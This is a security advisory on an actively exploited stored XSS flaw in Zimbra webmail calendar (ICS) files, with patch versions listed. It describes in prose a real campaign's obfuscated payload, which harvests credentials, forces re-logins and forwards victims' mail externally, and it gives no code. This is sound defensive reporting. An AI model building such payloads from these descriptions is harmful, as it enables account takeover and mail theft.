Zimbra Collaboration Suite flaw actively exploited with stored XSS through malicious Calendar files
Take action: If you're using Zimbra Collaboration Suite, update immediately to version 9.0.0 Patch 44 or higher, 10.0.13 or higher, or 10.1.5 or higher. Attackers are already exploiting this flaw with malicious calendar files. Until you patch, be extra cautious opening calendar invitations from unexpected or suspicious senders.
Learn More
Security researchers report active exploitation of a stored cross-site scripting (XSS) vulnerability in the Zimbra Collaboration Suite (ZCS).
The vulnerability is tracked as CVE-2025-27915 (CVSS score 5.4) and is caused by insufficient sanitization of HTML content within ICS files processed by Zimbra's Classic Web Client. ICS files, also known as iCalendar files, are commonly used to store and exchange calendar and scheduling information such as meetings, events, and tasks in plain text format between various calendar applications.
The flaw allows threat actors to embed malicious JavaScript code within these calendar attachment files. When a user opened an email containing the malicious calendar entry in Zimbra Webmail, the embedded script would execute automatically within the user's active session, giving attackers unauthorized access to the victim's account.
Vulnerable versions include:
- Zimbra Collaboration Suite (ZCS) version 9.0 (all versions prior to 9.0.0 P44)
- Zimbra Collaboration Suite (ZCS) version 10.0 (all versions prior to 10.0.13)
- Zimbra Collaboration Suite (ZCS) version 10.1 (all versions prior to 10.1.5)
In one documented incident, attackers targeted a Brazilian military organization by spoofing the Libyan Navy's Office of Protocol in a convincing phishing email. The malicious communication contained a weaponized ICS file approximately 100KB in size, significantly larger than typical calendar files. The JavaScript payload within the file was obfuscated using Base64 encoding to evade detection by security tools and to obscure the malicious intent from cursory examination.
The JavaScript payload delivered through this exploit represents a comprehensive data-stealing malware specifically engineered for Zimbra webmail environments. Analysis by StrikeReady researchers revealed that the malicious code is implemented to execute in asynchronous mode through various Immediately Invoked Function Expressions (IIFEs), a programming technique that allows the code to run immediately on loading while maintaining isolation from other scripts.
The malware's credential theft functionality creates hidden form fields on login pages to capture usernames and passwords as victims authenticate. It actively monitors user activity through mouse and keyboard tracking, and strategically triggers data theft operations when users become inactive, logging them out to force re-authentication and capture credentials without arousing suspicion.
The payload adds a malicious email filter rule named that automatically forwards all incoming emails to an external Proton Mail address, ensuring attackers receive copies of all future correspondence without requiring continued access to the compromised account.
Organizations running affected versions should upgrade immediately to one of the following patched releases: ZCS 9.0.0 Patch 44, ZCS 10.0.13, or ZCS 10.1.5. Zimbra has since issued additional security updates that also address this vulnerability, including versions 9.0.0 Patch 46, 10.0.15, and 10.1.9 released in June 2025.
